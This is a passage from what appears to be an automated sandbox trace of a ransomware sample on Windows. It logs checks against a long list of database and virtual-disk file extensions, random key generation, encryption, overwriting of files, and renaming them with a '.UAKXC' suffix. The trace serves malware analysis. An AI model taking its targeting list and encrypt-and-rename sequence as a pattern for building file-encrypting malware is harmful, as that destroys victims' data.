(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.156] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.157] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.158] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.159] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.159] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.159] WriteFile (in: hFile=0x210, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.223] WriteFile (in: hFile=0x210, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.223] SetEndOfFile (hFile=0x210) returned 1 [0141.230] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.230] ReadFile (in: hFile=0x210, lpBuffer=0x4100000, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x170, lpOverlapped=0x0) returned 1 [0141.230] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffffe90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.230] WriteFile (in: hFile=0x210, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x170, lpOverlapped=0x0) returned 1 [0141.231] CloseHandle (hObject=0x210) returned 1 [0141.235] GetProcessHeap () returned 0xea0000 [0141.235] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.235] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" [0141.235] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.UAKXC" [0141.235] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.uakxc")) returned 1 [0141.347] GetProcessHeap () returned 0xea0000 [0141.347] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.347] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddba8 | out: hHeap=0xea0000) returned 1 [0141.347] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2678 | out: hHeap=0xea0000) returned 1 [0141.347] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0141.348] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0141.348] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0141.348] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn")) returned 0x2022 [0141.349] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0141.349] GetLastError () returned 0x0 [0141.349] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=338) returned 1 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.350] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.351] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.352] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.353] StrStrIW 